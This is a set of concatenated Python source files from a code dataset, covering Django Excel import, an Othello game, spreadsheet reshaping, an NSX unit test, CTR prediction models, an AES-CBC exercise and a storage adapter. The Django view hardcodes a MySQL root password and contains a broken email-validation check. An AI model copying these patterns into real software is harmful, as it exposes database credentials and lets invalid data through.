(host=\"localhost\", user = \"root\", passwd = \"Basavaraj\", db = \"excel_data\")\n cursor = database.cursor()\n query = \"\"\"INSERT INTO myapp_employeeinfodata (name, email, phonenumber, age) VALUES (%s, %s, %s, %s)\"\"\"\n\n # Create a For loop to iterate through each row in the XLS file\n for r in range(1, sheet.nrows):\n name = sheet.cell(r,0).value\n \n if sheet.cell(r,1).value:\n email_valid = emailvalid(sheet.cell(r,1).value)\n if emailvalid:\n email = sheet.cell(r,1).value\n else:\n email = ''\n if sheet.cell(r,2).value:\n phone_valid = isphoneValid(str(sheet.cell(r,2).value)) \n if phone_valid:\n phonenumber = sheet.cell(r,2).value\n else:\n phonenumber = ''\n\n if sheet.cell(r,3).value:\n age = calculate_age(datetime.datetime(*xlrd.xldate_as_tuple(sheet.cell(r,3).value, book.datemode)))\n try:\n values = (name, email, phonenumber, age)\n cursor.execute(query, values)\n except Exception as e:\n print(\"\")\n cursor.close()\n # Commit the transaction\n database.commit()\n\n # Close the database connection\n database.close()\n # Execute sql Query\n excel_data = EmployeeInfoData.objects.all()\n elif 'search' in request.POST:\n search_name = request.POST.get('search_value')\n excel_data = EmployeeInfoData.objects.filter(name=search_name)\n else:\n excel_data = EmployeeInfoData.objects.all()\n\n return render(request, 'myapp/index.html', {\"excel_data\":excel_data})\n\n\n\n\n\n\n\n\n\n","sub_path":"my_django_project/myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"176388934","text":"\nclass GameController():\n \"\"\"This class displays the winner of the game and their number of tiles to\n the screen as well as prints it to the console when a winner is declared\"\"\"\n\n def __init__(self, WIDTH, HEIGHT):\n \"\"\"Initializes GameController object\n Int, Int --> None\n \"\"\"\n self.WIDTH = WIDTH\n self.HEIGHT = HEIGHT\n self.white_wins = False\n self.black_wins = False\n self.tie = False\n self.winning_num = 0\n self.end_game = False\n self.print_turn = True\n\n def update(self):\n ''' Displays text declaring winner of game to screen as well as\n number of winning tiles.\n None --> None\n '''\n if self.white_wins:\n fill(106, 20, 173)\n textSize(50)\n text(\"WHITE WINS WITH \" + str(self.winning_num) + \" TILES\",\n self.WIDTH/2 - 400, self.HEIGHT/2)\n if self.black_wins:\n fill(106, 20, 173)\n textSize(50)\n text(\"BLACK WINS WITH \" + str(self.winning_num) + \" TILES\",\n self.WIDTH/2 - 400, self.HEIGHT/2)\n if self.tie:\n fill(106, 20, 173)\n textSize(50)\n text(\"TIE WITH \" + str(self.winning_num) + \" TILES\",\n self.WIDTH/2 - 400, self.HEIGHT/2)\n\n def update_terminal(self):\n \"\"\" Prints winner of game and winning number of tiles to\n the terminal only once game is over.\n None --> prints string\n \"\"\"\n if not self.end_game and (self.white_wins or self.black_wins or\n self.tie):\n if self.white_wins:\n print(\"WHITE WINS WITH \" + str(self.winning_num) + \" TILES\")\n if self.black_wins:\n print(\"BLACK WINS WITH \" + str(self.winning_num) + \" TILES\")\n if self.tie:\n print(\"TIE WITH \" + str(self.winning_num) + \" TILES\")\n self.end_game = True\n\n","sub_path":"OthelloGame/game_controller.py","file_name":"game_controller.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"99053560","text":"import openpyxl\r\n\r\n\r\n# book:吸いだしたいシートのあるブック名, sheet:吸いだし元となるシート名\r\n# suidashi():{日付: [[予約情報],[予約情報]...[予約情報]]}の形の辞書のリストを返す\r\n\r\ndef suidashi(book, sheet):\r\n print('ワークブックを開きます...')\r\n\r\n wb = openpyxl.load_workbook(book)\r\n sheet = wb[sheet]\r\n # 取得したい行の範囲を指定(全て2列~13列)\r\n row_area = [[2, 33], [43, 74], [82, 113], [121, 151], [155, 186]]\r\n # 取得したい列の範囲を指定\r\n column_area = [2, 13]\r\n\r\n # 吸いだし作業\r\n all_list = []\r\n for i in range(0, len(row_area)):\r\n start_row = row_area[i][0]\r\n last_row = row_area[i][1]\r\n #  列ごとに吸い出す\r\n area_list = []\r\n for columns in list(sheet.columns):\r\n if not column_area[0] <= columns[0].column <= column_area[1]: # 条件に合わない範囲の列は飛ばす\r\n continue\r\n #  列から行ごとに吸い出す\r\n rows_list = []\r\n for cell in columns:\r\n if start_row <= cell.row <= last_row: # 条件に合う範囲のセルのみ取得\r\n rows_list.append(cell.value)\r\n area_list.append(rows_list)\r\n all_list.append(area_list)\r\n\r\n # 吸いだしたリストの整形作業1周目\r\n all_list2 = []\r\n for area in all_list:\r\n area_list2 = []\r\n for column_lis in area:\r\n dic_list = []\r\n for n in range(0, len(column_lis) - 1)[::2]:\r\n lis = []\r\n if n == 0:\r\n dic_list.append(column_lis[n])\r\n else:\r\n lis.append(column_lis[n])\r\n lis.append(column_lis[n + 1])\r\n dic_list.append(lis)\r\n area_list2.append(dic_list)\r\n all_list2.append(area_list2)\r\n\r\n # 吸いだしたリストの整形作業2周目\r\n all_list3 = []\r\n for area in all_list2:\r\n area_list3 = []\r\n for i in range(0, len(area) - 1)[::2]:\r\n area_list3.append(list(zip(area[i], area[i + 1])))\r\n all_list3.append(area_list3)\r\n\r\n # 吸いだしたリストの整形作業3周目(これで最後)\r\n all_list4 = []\r\n for area in all_list3:\r\n for column in area:\r\n master_data = {}\r\n cells_list = []\r\n for cell in column[1:]:\r\n name = cell[0][0]\r\n school = cell[0][1]\r\n memo = cell[1][0]\r\n time = cell[1][1]\r\n lis = [name, school, memo, time]\r\n cells_list.append(lis)\r\n master_data[column[0][0]] = cells_list\r\n if list(master_data.keys())[0] is not None:\r\n master_data[list(master_data.keys())[0]] = cells_list\r\n all_list4.append(master_data)\r\n\r\n return all_list4\r\n\r\n\r\n# suidashi()で得られたリスト(data_list)を、['日付', 'name', 'school', 'memo', 'time' ]のリストに変換\r\ndef to_list(data_list):\r\n reserve_list = []\r\n for dic in data_list:\r\n for k, v in dic.items():\r\n for i in v:\r\n lis = [k, *i]\r\n reserve_list.append(lis)\r\n return reserve_list\r\n\r\n\r\n# to_list()で得られたリスト(reserve_lis)を、bookの各行に書込む\r\ndef write_excel(reserve_lis, book):\r\n wb = openpyxl.Workbook()\r\n ws = wb.active\r\n for row in reserve_lis:\r\n ws.append(row)\r\n wb.save(book)\r\n print('書込み完了')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # 'SampleBook.xlsx'の'SampleSheet'からデータを吸い出し、整形した後、'SampleBook_transform.xlsx'を新規作成し書き込む\r\n write_excel(to_list(suidashi('SampleBook.xlsx', 'SampleSheet')), 'SampleBook_transform.xlsx')\r\n","sub_path":"kp_project.py","file_name":"kp_project.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"611406675","text":"# Copyright 2017 VMware, Inc.\n# All Rights Reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport mock\nfrom neutron.tests import base\nfrom neutron_lib.plugins import constants\n\nfrom vmware_nsx.plugins.common.housekeeper import base_job\nfrom vmware_nsx.plugins.nsx_v.housekeeper import error_backup_edge\n\nFAKE_ROUTER_BINDINGS = [\n {\n 'router_id': 'backup-3b0b1fe1-c984', 'status': 'ERROR',\n 'availability_zone': 'default', 'edge_id': 'edge-782',\n 'edge_type': 'service', 'appliance_size': 'compact'}]\n\n\nclass ErrorBackupEdgeTestCaseReadOnly(base.BaseTestCase):\n\n def setUp(self):\n def get_plugin_mock(alias=constants.CORE):\n if alias in (constants.CORE, constants.L3):\n return self.plugin\n\n super(ErrorBackupEdgeTestCaseReadOnly, self).setUp()\n self.plugin = mock.Mock()\n self.context = mock.Mock()\n self.context.session = mock.Mock()\n mock.patch('neutron_lib.plugins.directory.get_plugin',\n side_effect=get_plugin_mock).start()\n self.log = mock.Mock()\n base_job.LOG = self.log\n self.job = error_backup_edge.ErrorBackupEdgeJob(True, [])\n\n def run_job(self):\n self.job.run(self.context, readonly=True)\n\n def test_clean_run(self):\n mock.patch('vmware_nsx.db.nsxv_db.get_nsxv_router_bindings',\n return_value=[]).start()\n self.run_job()\n self.log.warning.assert_not_called()\n\n def test_broken_backup_edge(self):\n mock.patch('vmware_nsx.db.nsxv_db.get_nsxv_router_bindings',\n return_value=FAKE_ROUTER_BINDINGS).start()\n\n self.run_job()\n self.log.warning.assert_called_once()\n\n\nclass ErrorBackupEdgeTestCaseReadWrite(ErrorBackupEdgeTestCaseReadOnly):\n def run_job(self):\n self.job.run(self.context, readonly=False)\n\n def test_broken_backup_edge(self):\n upd_binding = mock.patch(\n 'vmware_nsx.db.nsxv_db.update_nsxv_router_binding').start()\n upd_edge = mock.patch.object(self.plugin.nsx_v, 'update_edge').start()\n self.job.azs = mock.Mock()\n az = mock.Mock()\n mock.patch.object(self.job.azs, 'get_availability_zone',\n return_value=az).start()\n super(ErrorBackupEdgeTestCaseReadWrite, self\n ).test_broken_backup_edge()\n upd_binding.assert_has_calls(\n [mock.call(mock.ANY, r['router_id'], status='ACTIVE')\n for r in FAKE_ROUTER_BINDINGS])\n upd_edge.assert_called_with(\n self.context, 'backup-3b0b1fe1-c984', 'edge-782',\n 'backup-3b0b1fe1-c984', None, appliance_size='compact',\n availability_zone=az, dist=False)\n","sub_path":"vmware_nsx/tests/unit/nsx_v/housekeeper/test_error_backup_edge.py","file_name":"test_error_backup_edge.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"216406741","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : vpaz\nDate : 2019-02-01\nPurpose: Rock the Casbah\n\"\"\"\n\nimport os\nimport sys\n\n\n# --------------------------------------------------\ndef main():\n arg = sys.argv[1:]\n \n if len(arg) == 0:\n print('Usage: {} STRING'.format(os.path.basename(sys.argv[0])))\n sys.exit(1)\n elif len(arg) >= 1:\n num = 0\n for letters in arg[0]:\n if letters in 'aeiouAEIOU':\n num += 1 \n if num == 1:\n print('There is {} vowel in \"{}.\"'.format(str(num), arg[0]))\n else:\n print('There are {} vowels in \"{}.\"'.format(str(num), arg[0]))\n\n# --------------------------------------------------\nmain()\n","sub_path":"assignments/03-python-hello/vowel_counter.py","file_name":"vowel_counter.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"439118343","text":"# coding=utf-8\n\nimport pandas as pd\n\n\n\ndef fit(path, path2):\n \n origin = pd.read_csv(path, encoding='utf-8-sig')\n hand = pd.read_excel(path2, sheet_name=0, encoding='utf-8-sig')\n\n origin.loc[origin['in_node'] == origin['out_node'], 'type_user'] = '无效语义'\n origin['type_handle'] = ['*' for i in range(len(origin))]\n\n for i, x in hand.iterrows():\n print(i)\n sid = int(x['session_id'])\n in_node = x['in_node']\n msg = x['msg']\n handle = x['type_handle']\n \n # 根据session id 查找对应的idx1\n indicate = origin.loc[origin['session_id']==sid]\n # print(indicate)\n\n idx1 = indicate.index\n indicate2 = origin.loc[idx1].loc[origin['in_node'] == in_node]\n\n # print(indicate2)\n # 根据idx1 和 in_node 查找对应的idx2\n idx2 = indicate2.index\n # print(origin.loc[idx2, 'msg'])\n idx3 = origin.loc[idx2].loc[origin['msg'].str.contains(msg)].index \n\n # 如果type_handle 是空值, 或者是无效语义, 设置type_handle, 如果不是, 直接跳过\n # 根据 idx3 查找并, 设定对应的 type_handle值\n if origin.loc[idx3, 'type_handle'].tolist()[0] in ['', '*', '无效语义']:\n origin.loc[idx3, 'type_handle'] = [handle for i in range(len(idx3))]\n\n return origin \n\n\n\n\ndef eval(df=None, if_csv=False, save_p=''):\n \n df = df.dropna(subset=['type_handle'])\n df = df.loc[df['type_handle'] != '*']\n total = len(df)\n\n error = df.loc[df['type_user'] != df['type_handle']]\n error = len(error)\n\n e_rate = error/total\n r_rate = 1 - e_rate\n print(r_rate)\n \n if if_csv:\n df.to_csv(save_p, index=False, encoding='utf-8-sig')\n\n\n\n# 去重标注数据 -> 未去重未标注数据\ndef mapping(path, path2):\n target = pd.read_excel(path, sheet_name=0, encoding='utf-8-sig' )\n label = pd.read_excel(path2, sheet_name=0, encoding='utf-8-sig')\n\n\n for i, l in label.iterrows():\n print(i)\n sid = l['session_id']\n in_node = l['in_node']\n msg = l['msg']\n handle = l['type_handle']\n\n first = target.loc[target['session_id'] == sid].index\n second = target.loc[first].loc[target['in_node'] == in_node].index\n final = target.loc[second].loc[target['msg'] == msg].index\n\n target.loc[final, 'type_handle'] = handle\n\n target.to_excel('./m1/hayinm1_nodel_tag_biaozhu.xlsx', encoding='utf-8-sig')\n\n \n\n\n\n\nif __name__ == \"__main__\":\n \n # 评估文件\n path = './m2/eval_m2.csv'\n \n # 拼接文件\n path_del_tag = './m2/hayinm2_tag_biaozhu.xlsx'\n \n # 未去重复文件和未去重拼接文件\n # path_nodel = './m1/hayinm1_nodel_tag.xlsx'\n path_nodel_tag ='./m2/m2_tag_biaozhu_nodel.xlsx' \n\n origin = fit(path, path_nodel_tag) \n eval(origin, if_csv=True, save_p='./m2/eval_nodel_result.csv')\n # mapping(path_nodel, path2)\n","sub_path":"pandas_learn/哈银_数据读取_案例/hayin_xiaofei_data_eval/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"54845258","text":"# -*- coding: utf-8 -*-\nimport sys\nimport csv\nimport time\nimport pickle\nimport numpy as np\nimport warnings\n\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.externals import joblib\n\nfrom output import printGreen, printYellow, printRed\n\nwarnings.filterwarnings(\"ignore\") # Some depreciate warnings regarding scikit in online learning\n\n#\n# PROCESS DATA\n#\ndef process_data(samples, offset=0):\n # Build dataframes\n X_dict = []\n y = []\n\n # Open file\n with open('../data/raw/train', 'r') as csvfile:\n # Create reader\n reader = csv.DictReader(csvfile)\n for i in range(offset):\n next(reader)\n i = 0\n for row in reader:\n i += 1\n\n # Append Label to y\n y.append(int(row['click']))\n # Remove features\n del row['click'], row['id'], row['hour'], row['device_id'], row['device_ip']\n \n # Append input to X\n X_dict.append(row)\n if i >= samples:\n break\n \n return X_dict, y\n\n#\n# DECISION TREE ~20 min to train\n#\ndef decision_tree(load_model=False):\n start = time.time()\n if load_model == False:\n printYellow(\"* Decision tree model training started...\")\n\n # Create training set of 100,000 samples\n n_max = 100000\n X_dict_train, y_train = process_data(100000)\n\n # Transform training dictionary into one-hot encoded vectors\n dict_one_hot_encoder = DictVectorizer(sparse=False)\n X_train = dict_one_hot_encoder.fit_transform(X_dict_train)\n # print(len(X_train[0]))\n\n # Creating test set and turn into one-hot encoded vectors\n X_dict_test, y_test = process_data(100000, 100000)\n X_test = dict_one_hot_encoder.transform(X_dict_test)\n # print(len(X_test[0]))\n \n # Load Model\n if load_model == True:\n printGreen('✔ Loading model from previous training...')\n d_tree_file = open('../models/decision_tree_model.sav', 'rb')\n decision_tree_final = pickle.load(d_tree_file)\n # d_tree_file.close()\n\n # Evaluate model on test set\n prob = decision_tree_final.predict_proba(X_test)[:, 1]\n score = roc_auc_score(y_test, prob)\n printGreen('✔ ROC AUC score on test set: {0:.3f}'.format(score))\n d_tree_file.close()\n return 0\n\n # Train decision tree classifier\n params = {'max_depth': [3, 10, None]}\n decision_tree_model = DecisionTreeClassifier(criterion='gini',\n min_samples_split=30)\n grid_search = GridSearchCV(decision_tree_model, params, n_jobs=-1, cv=3, scoring='roc_auc')\n # print(\"Training started..\")\n grid_search.fit(X_train, y_train)\n printGreen('✔ Decision tree model training complete...\"\\t\\t{0:.1f}s'.format(time.time() - start))\n\n # Use model with best parameter as final model\n decision_tree_final = grid_search.best_estimator_\n\n # Evaluate and run model on training data\n prob = decision_tree_final.predict_proba(X_test)[:, 1]\n score = roc_auc_score(y_test, prob)\n printGreen('✔ ROC AUC score on test set: {0:.3f}'.format(score))\n\n # Save Model\n decision_tree_model_file = open('../models/decision_tree_model.sav', \"wb\")\n pickle.dump(decision_tree_final, decision_tree_model_file)\n decision_tree_model_file.close()\n printGreen('✔ Decision tree model saved...')\n\n return 0\n\n#\n# RANDOM FOREST ~ 20 min to train\n#\ndef random_forest(load_model=False):\n start = time.time()\n if load_model == False:\n printYellow(\"* Random forest model training started...\")\n\n # Create training set of 100,000 samples\n n_max = 100000\n X_dict_train, y_train = process_data(100000)\n\n # Transform training dictionary into one-hot encoded vectors\n dict_one_hot_encoder = DictVectorizer(sparse=False)\n X_train = dict_one_hot_encoder.fit_transform(X_dict_train)\n\n # Creating test set and turn into one-hot encoded vectors\n X_dict_test, y_test = process_data(100000, 100000)\n X_test = dict_one_hot_encoder.transform(X_dict_test)\n\n # Load model instead of training again..\n if load_model == True:\n printGreen('✔ Loading model from previous training...')\n r_forest_file = open('../models/random_forest_model.sav', 'rb')\n random_forest_final = pickle.load(r_forest_file)\n probs = random_forest_final.predict_proba(X_test)[:, 1]\n score = roc_auc_score(y_test, probs)\n printGreen('✔ ROC AUC score on test set: {0:.3f}'.format(score))\n r_forest_file.close()\n return 0\n \n # Train random forest classifier\n params = {'max_depth': [3, 10, None]}\n random_forest_model = RandomForestClassifier(n_estimators=100, criterion='gini', min_samples_split=30,\n n_jobs=-1)\n grid_search = GridSearchCV(random_forest_model, params, n_jobs=-1, cv=3, scoring='roc_auc')\n grid_search.fit(X_train, y_train)\n printGreen('✔ Random forest model training complete...\"\\t\\t{0:.1f}s'.format(time.time() - start))\n\n # Use best paramter for final model\n random_forest_final = grid_search.best_estimator_\n\n # Evaluate model\n probs = random_forest_final.predict_proba(X_test)[:, 1]\n score = roc_auc_score(y_test, probs)\n printGreen('✔ ROC AUC score on test set: {0:.3f}'.format(score))\n\n # Save Model\n random_forest_file = open('../models/random_forest_model.sav', \"wb\")\n pickle.dump(random_forest_final, random_forest_file)\n random_forest_file.close()\n printGreen('✔ Random forest model saved...')\n return 0\n\n#\n# SGD-BASED LOGISTIC REGRESSION ~20 sec. to train\n#\ndef logistic_regression(sample_size=100000, load_model=False):\n start = time.time()\n if load_model == False:\n printYellow(\"* Logistic regression model training started...\")\n\n # Create Training Set\n n = sample_size\n X_dict_train, y_train = process_data(n)\n dict_one_hot_encoder = DictVectorizer(sparse=False)\n X_train = dict_one_hot_encoder.fit_transform(X_dict_train)\n\n # Create Test Set\n X_dict_test, y_test = process_data(n, n)\n X_test = dict_one_hot_encoder.transform(X_dict_test)\n\n X_train_n = X_train\n y_train_n = np.array(y_train)\n\n # Load model instead of training again\n if load_model == True:\n printGreen('✔ Loading model from previous training...')\n l_reg_file = open('../models/logistic_regression_model.sav', 'rb')\n sgd_log_reg_model = pickle.load(l_reg_file)\n predictions = sgd_log_reg_model.predict_proba(X_test)[:, 1]\n score = roc_auc_score(y_test, predictions)\n printGreen(\"✔ ROC AUC score on test set: {0:.3f}\".format(score))\n return 0\n\n # Create SGD Logistic Regression Classifier\n sgd_log_reg_model = SGDClassifier(loss='log', penalty=None, fit_intercept=True,\n n_iter=5, learning_rate='constant', eta0=0.01)\n\n # Train Classifier\n sgd_log_reg_model.fit(X_train_n, y_train_n)\n printGreen('✔ Logistic regression model training complete...\"\\t\\t{0:.1f}s'.format(time.time() - start))\n\n # Run model on test set\n predictions = sgd_log_reg_model.predict_proba(X_test)[:, 1]\n\n # Evaluate model\n score = roc_auc_score(y_test, predictions)\n printGreen(\"✔ ROC AUC score on test set: {0:.3f}\".format(score))\n\n # Save model\n l_reg_file = open('../models/logistic_regression_model.sav', \"wb\")\n pickle.dump(sgd_log_reg_model, l_reg_file)\n l_reg_file.close()\n printGreen('✔ Logistic regression model saved...')\n\n#\n# LOGISTIC REGRESSION USING ONLINE LEARNING ~6 min. to train\n#\ndef logistic_regression_ol(load_model=False):\n start = time.time()\n if load_model == False:\n printYellow(\"* Logistic regression (using online learning) model training started...\")\n\n # Build Classifier\n sgd_log_reg_model = SGDClassifier(loss='log', penalty=None, fit_intercept=True, n_iter=1, learning_rate='constant', eta0=0.01)\n \n # Training sets\n X_dict_train, y_train = process_data(100000)\n dict_one_hot_encoder = DictVectorizer(sparse=False)\n X_train = dict_one_hot_encoder.fit_transform(X_dict_train)\n \n X_train_100k = X_train\n y_train_100k = np.array(y_train)\n\n # Test sets\n X_dict_test, y_test_next10k = process_data(10000, 100000)\n X_test_next10k = dict_one_hot_encoder.transform(X_dict_test)\n\n \n if load_model == True:\n printGreen('✔ Loading model from previous training...')\n l_reg_file = open('../models/logistic_regression_model_ol.sav', 'rb')\n sgd_log_reg_model = pickle.load(l_reg_file)\n X_dict_test, y_test_next = process_data(10000, (20 + 1) * 200000)\n X_test_next = dict_one_hot_encoder.transform(X_dict_test)\n predict = sgd_log_reg_model.predict_proba(X_test_next)[:, 1]\n score = roc_auc_score(y_test_next, predict)\n printGreen(\"✔ ROC AUC score on test set: {0:.3f}\".format(score))\n return 0\n\n # Train and partially fit on 1 million samples\n for i in range(20):\n X_dict_train, y_train_every = process_data(100000, i * 100000)\n X_train_every = dict_one_hot_encoder.transform(X_dict_train)\n sgd_log_reg_model.partial_fit(X_train_every, y_train_every, classes=[0, 1])\n \n printGreen('✔ Logistic regression (using online learning) model training complete...\"\\t\\t{0:.1f}s'.format(time.time() - start))\n \n # Get test set\n X_dict_test, y_test_next = process_data(10000, (i + 1) * 200000)\n X_test_next = dict_one_hot_encoder.transform(X_dict_test)\n \n # Evaluate\n predict = sgd_log_reg_model.predict_proba(X_test_next)[:, 1]\n score = roc_auc_score(y_test_next, predict)\n printGreen(\"✔ ROC AUC score on test set: {0:.3f}\".format(score))\n\n # Save Model\n l_reg_file = open('../models/logistic_regression_model_ol.sav', \"wb\")\n pickle.dump(sgd_log_reg_model, l_reg_file)\n l_reg_file.close()\n printGreen('✔ Logistic regression (using online learning) model saved...')\n return 0\n\n#\n# MAIN\n#\ndef main():\n # Initial Message\n printGreen(\"Click-through rate models training started...\\n\")\n\n # Decision Tree\n printGreen('Decision Tree')\n decision_tree(load_model=True)\n print('\\n')\n\n # Random Forest\n printGreen('Random Forest')\n random_forest(load_model=False)\n print('\\n')\n\n # Logistic Regression\n printGreen('SGD Based Logistic Regression')\n logistic_regression(load_model=True)\n print('\\n')\n\n # OL Logistic Regression\n printGreen('Logistic Regressions using Online Learning')\n logistic_regression_ol(load_model=True)\n print('\\n')\n\n printGreen(\"✔ Done\")\n\nif __name__ == '__main__':\n main()","sub_path":"src/ctr_prediction.py","file_name":"ctr_prediction.py","file_ext":"py","file_size_in_byte":10922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"313025375","text":"from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.backends import default_backend\nfrom functools import reduce\nimport base64\n\n\nbackend = default_backend()\n\n\ndef xor(bytestr1, bytestr2):\n return [bytestr1[i] ^ bytestr2[i] for i in range(len(bytestr1))]\n\n\ndef padPKCS7(text, keyL):\n pad = keyL - (len(text) % keyL)\n return text + bytes([pad] * pad)\n\n\ndef splitTXT(text, keySize):\n k = keySize\n return [text[i:i+k] for i in range(0, len(text), k)]\n\n\ndef aesECBEncrypt(key, plain):\n cipher = Cipher(algorithms.AES(key), modes.ECB(), backend=backend)\n encryptor = cipher.encryptor()\n return encryptor.update(plain) + encryptor.finalize()\n\n\ndef aesECBDecrypt(key, ciphertxt):\n cipher = Cipher(algorithms.AES(key), modes.ECB(), backend=backend)\n decryptor = cipher.decryptor()\n return decryptor.update(ciphertxt) + decryptor.finalize()\n\n\ndef aesCBCEncrypt(key, plain, IV):\n blocks = splitTXT(plain, 16)\n blocks[-1] = padPKCS7(blocks[-1], 16)\n x0 = xor(blocks[0], IV)\n cipherTxt = [aesECBEncrypt(key, x0)]\n for i in range(1, len(blocks)):\n x = xor(cipherTxt[i-1], blocks[i])\n cipherTxt.append(aesECBEncrypt(key, x))\n return b''.join(cipherTxt)\n\n\ndef aesCBCDecrypt(key, ciphertext, IV):\n blocks = splitTXT(ciphertext, 16)\n x0 = aesECBDecrypt(key, blocks[0])\n plainList = [xor(x0, IV)]\n for i in range(1, len(blocks)):\n plainList.append(xor(blocks[i-1], aesECBDecrypt(key, blocks[i])))\n plainList = reduce(lambda x, y: x+y, plainList)\n return \"\".join([chr(j) for j in plainList])\n\n\nif __name__ == \"__main__\":\n\n key = b'YELLOW SUBMARINE'\n IV = bytes(16)\n\n with open('cipherfile5', 'r') as f:\n c = f.read()\n x = base64.b64decode(c)\n\n print(aesCBCDecrypt(key, x, IV))\n","sub_path":"ch10.py","file_name":"ch10.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"22543258","text":"import io\nfrom functools import partial\nfrom typing import List\nfrom typing import Optional, Union\n\nfrom ..base import (adapter,\n split_protocol_path,\n without_protocol,\n join_protocol_path,\n handle_error)\nfrom ... import security\n\n_ADAPTERS_AVAILABLE = {\n 'file': ('ink.core.forge.joins.core.io.storage.adapters.file_system', 'FileSystemStorageAdapter'),\n 'gs': ('ink.core.forge.joins.core.io.storage.adapters.google_cloud', 'GoogleCloudStorageAdapter')\n}\n_ADAPTERS = {}\n\nadapter = partial(adapter,\n adapters=_ADAPTERS,\n adapters_available=_ADAPTERS_AVAILABLE)\n\n\ndef open(filename: str, mode: str = 'rb', encoding='utf-8', on_error: str = 'raise'):\n \"\"\"Open files from multiple sources.\n\n # TODO: Implement cryptography for sources.\n \"\"\"\n if not 3 >= len(mode) >= 1 or len(mode) > 1 and mode[1] not in {'+', 'b'}:\n return handle_error('invalid mode: ' + mode, on_error, ValueError)\n\n both = len(mode) > 1 and mode[1] == '+'\n binary = mode[-1] == 'b'\n\n protocol, filename = split_protocol_path(filename)\n try:\n ap = adapter(protocol)\n mode = '+' if both else mode[0]\n\n if mode[0] == '+':\n stream = io.BufferedRWPair(ap.reader(filename), ap.writer(filename))\n elif mode[0] == 'r':\n stream = ap.reader(filename)\n elif mode[0] in ('w', 'a'):\n stream = ap.writer(filename, append=mode[0] == 'a')\n else:\n return handle_error('invalid mode: ' + mode, on_error, ValueError)\n\n if not binary:\n stream = io.TextIOWrapper(stream, encoding)\n\n return stream\n except FileNotFoundError as error:\n handle_error(error, on_error)\n\n\ndef read(filename: str, encoding='utf-8', crypto: security.Crypto = None,\n on_error: str = 'raise') -> str:\n \"\"\"Reads a file from storage.\n\n Parameters\n ----------\n filename : str\n crypto : security.Crypto\n Cryptography agent to be used for decryption.\n encoding : str, optional\n Encoding to read the file into (default: ``'utf-8'``).\n on_error : {'raise', 'log'}, optional\n Behavior in case errors happen during the process (default: ``'raise'``).\n\n Returns\n -------\n str\n\n Raises\n ------\n FileNotFoundError\n If file does not exist in storage.\n\n \"\"\"\n protocol, filename = split_protocol_path(filename)\n try:\n data = adapter(protocol).read(filename)\n if crypto:\n data = crypto.decrypt(data)\n return data.decode(encoding)\n except FileNotFoundError as error:\n handle_error(error, on_error)\n\n\ndef write(filename: str, data: Union[bytes, str], encoding='utf-8', crypto: security.Crypto = None):\n \"\"\"Writes data to a file on storage.\n\n Parameters\n ----------\n filename : str\n data : bytes or str\n encoding : str, optional\n Encoding to use when ``data`` is of type ``str`` (default: ``'utf-8'``).\n crypto : security.Crypto\n Cryptography agent to be used for encryption.\n\n \"\"\"\n protocol, filename = split_protocol_path(filename)\n if isinstance(data, str):\n data = data.encode(encoding)\n if crypto:\n data = crypto.encrypt(data)\n adapter(protocol).write(filename, data)\n\n\ndef delete(filename: str, on_error: str = 'raise'):\n \"\"\"Deletes a file from storage.\n\n Parameters\n ----------\n filename : str\n on_error : {'raise', 'log'}, optional\n Behavior in case errors happen during the process (default: ``'raise'``).\n\n Raises\n ------\n FileNotFoundError\n If the specified directory does not exist.\n\n \"\"\"\n protocol, filename = split_protocol_path(filename)\n try:\n adapter(protocol).delete(filename)\n except FileNotFoundError as error:\n handle_error(error, on_error)\n\n\ndef copy(source: str, target: str, on_error: str = 'raise', move: bool = False):\n \"\"\"Copies a file internally or between storages.\n\n Parameters\n ----------\n source, target : str\n Source and target file names.\n on_error : {'raise', 'log'}, optional\n Behavior in case errors happen during the process (default: ``'raise'``).\n move : bool, optional\n Whether to delete the file after copying (default: False).\n\n Raises\n ------\n FileNotFoundError\n If source file does not exist.\n\n \"\"\"\n source_protocol, source_filename = split_protocol_path(source)\n target_protocol, target_filename = split_protocol_path(target)\n try:\n adapter(source_protocol).copy(source_filename, target_filename,\n other=adapter(target_protocol), move=move)\n except FileNotFoundError as error:\n handle_error(error, on_error)\n\n\ndef move(source: str, target: str, on_error: str = 'raise'):\n \"\"\"Moves a file internally or between storages.\n\n Parameters\n ----------\n source, target : str\n Source and target file names.\n on_error : {'raise', 'log'}, optional\n Behavior in case errors happen during the process (default: ``'raise'``).\n\n Raises\n ------\n FileNotFoundError\n If source file does not exist.\n\n \"\"\"\n copy(source, target, on_error, move=True)\n\n\ndef listdir(dirname: str, matching: Optional[str] = None, on_error: str = 'raise') -> List[str]:\n \"\"\"Lists contents 